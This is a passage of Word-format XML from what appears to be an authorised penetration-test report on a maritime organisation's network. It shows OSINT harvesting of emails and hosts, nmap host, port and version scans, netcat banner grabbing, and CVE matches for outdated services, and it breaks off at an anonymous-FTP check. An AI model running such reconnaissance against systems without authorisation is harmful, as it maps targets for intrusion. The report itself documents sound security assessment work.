              <w:t xml:space="preserve">org:"NEOM Maritime" default password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;&gt; 3 devices flagged with factory-default credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.5 theHarvester — OSINT Aggregation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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ theHarvester -d neom-maritime.sa -b all</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Emails found:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    admin@neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ops.manager@neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    it.support@neom-maritime.sa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    vts.control@neom-maritime.sa</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Hosts found:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    vts.neom-maritime.sa    172.16.10.20</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    port.neom-maritime.sa   172.16.10.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    dev.neom-maritime.sa    172.16.10.50</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    scada.neom-maritime.sa  172.16.20.10</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IP Ranges: 172.16.0.0/16 (Primary maritime network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Active Enumeration (Authorised)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2.1 Host Discovery — Ping Sweep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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nmap -sn 172.16.10.0/24</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Host: 172.16.10.5   (web-portal)       [UP]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: 172.16.10.15  (mail-server)       [UP]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: 172.16.10.20  (vts-dashboard)     [UP]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: 172.16.10.25  (vpn-gateway)       [UP]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: 172.16.10.30  (port-mgmt-system)  [UP]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: 172.16.10.50  (dev-server)        [UP]</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6 hosts up out of 254 scanned.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2.2 Port Scanning — TCP SYN Scan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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nmap -sS -p- 172.16.10.20   [VTS Dashboard Server]</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PORT      STATE    SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp    open     ssh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">23/tcp    open     telnet        [CRITICAL — unencrypted]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp    open     http</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">443/tcp   open     https</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3306/tcp  open     mysql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9200/tcp  open     elasticsearch [no authentication]</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nmap -sS -p- 172.16.10.30   [Port Management System]</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PORT      STATE   SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">21/tcp    open    ftp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp    open    ssh</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp    open    http</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3306/tcp  open    mysql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2.3 Service &amp; Version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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nmap -sV -O 172.16.10.20</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PORT      STATE  SERVICE    VERSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp    open   ssh        OpenSSH 6.6.1p1 Ubuntu</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">23/tcp    open   telnet     Linux telnetd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">80/tcp    open   http       Apache httpd 2.4.18</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3306/tcp  open   mysql      MySQL 5.7.32</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9200/tcp  open   http       Elasticsearch 6.8.0</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OS: Ubuntu 16.04 LTS (kernel 4.4.0)</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CVE Lookup:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  Apache 2.4.18  -&gt;  CVE-2017-7679  [Critical — buffer overflow]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  OpenSSH 6.6.1  -&gt;  CVE-2016-6515  [High — DoS via long password]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  MySQL 5.7.32   -&gt;  CVE-2021-2307  [Medium — privilege escalation]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2.4 Banner Grabbing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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># HTTP Banner</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nc -v 172.16.10.20 80</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET / HTTP/1.0</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Server: Apache/2.4.18 (Ubuntu)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Powered-By: PHP/7.0.33</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Telnet Banner — Port 23 [CRITICAL]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nc 172.16.10.20 23</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ubuntu 16.04 LTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">VTS-CONTROL-01 login:</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FTP Banner — Port 21</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$ nc 172.16.10.30 21</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">220 ProFTPD 1.3.5 Server [VTS-PORT-MGMT] ready.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5C8E"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2.5 NSE Scripts — Automated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C00" w:sz="2"/>
              <w:left w:val="single" w:color="00CC00" w:sz="2"/>
              <w:bottom w:val="single" w:color="00CC00" w:sz="2"/>
              <w:right w:val="single" w:color="00CC00" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:fill="1A1A2E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Anonymous FTP access check</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF41"/>
